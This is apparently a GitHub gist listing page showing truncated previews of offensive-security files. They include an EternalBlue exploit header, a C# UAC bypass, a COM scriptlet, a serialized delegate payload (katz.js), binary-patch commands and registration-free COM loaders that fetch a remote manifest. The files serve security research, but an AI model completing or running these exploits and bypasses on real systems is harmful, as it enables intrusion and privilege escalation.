View tonelli-shanks.cs
/*
Tonelli-Shanks Algorithm in C#
For a good overview of the importance of this algorithm.
See:
http://publications.csail.mit.edu/lcs/pubs/pdf/MIT-LCS-TR-212.pdf
http://www.math.vt.edu/people/ezbrown/doc/sqrts.pdf
https://www.amazon.com/Cryptanalytic-Attacks-RSA-Song-Yan/dp/1441943102
example by Casey Smith
@subTee
*/
View eternalblue_exploit.py
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
View EventVwrBypass.cs
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass
View test.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
View katz.js
This file has been truncated, but you can view the full file.
var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
View scriptlet.md

The Scriptless Scriptlet

Or how to execute JavaScript from CSS in MSIE11 without using Scripts

Stop! This text is only interesting for you if you...

  • Like popping alerts in weird situations
  • Miss CSS expressions as much as we do
  • Have an unhealthy obsession for markup porn

Introduction

View _commands.txt
#Build Your Binaries
c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe a.cs
c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe b.cs
c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe c.cs
# Create Your Patch
# You need Windows 7 SDK
"C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin\mpatch.exe" a.exe b.exe dbi_patch
View regfreeCom.ps1
# Make Sure dynwrapx,dll is in %temp%
$a = new-object -com Microsoft.Windows.ActCtx
$a.ManifestURL = 'https://gist.githubusercontent.com/subTee/36df32293bc5006148bb6b03b5c4b2c1/raw/661b5aafd55288930761d9ad4eabe7403146ab5c/dynwrapx.dll.manifest'
$b = $a.CreateObject("DynamicWrapperX")
$b.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l") | Out-Null
$b.MessageBoxW(0, "Hello, world!", "Test", 4) | Out-Null
View dynwrap.js
var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" );
actCtx.Manifest = "C:\\Tools\\COM\\dynwrap.test.manifest";
try
{
var DX = actCtx.CreateObject("DynamicWrapperX");
DX.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l"); // Register a dll function.
res = DX.MessageBoxW(0, "Hello, world!", "Test", 4); // Call the function.
}
catch(e){ WScript.Echo("Fail");}
View gist:ac88553b5fe094aba9fa19f1d75f92b9
An Automation Object for Dynamic DLL Calls
Here's an OLE automation object for dynamically declaring and accessing functions in external DLLs 


November 01, 1998
URL:http://www.drdobbs.com/windows/an-automation-object-for-dynamic-dll-cal/210200078 

Jeff Stong has been developing DOS, Windows, and Windows NT based applications for 10 years. Jeff can be contacted at Jeff_V_Stong@msn.com.
You can access external DLLs from Visual Basic by using the Declare statement to declare the name of the function you want to call and the DLL that it resides in. VBScript, however, doesn't support the Declare statement. This article presents an OLE automation object that lets VBScript (or any other environment that can access automation objects) dynamically declare and access functions in external DLLs.
Using the DynamicWrapper Object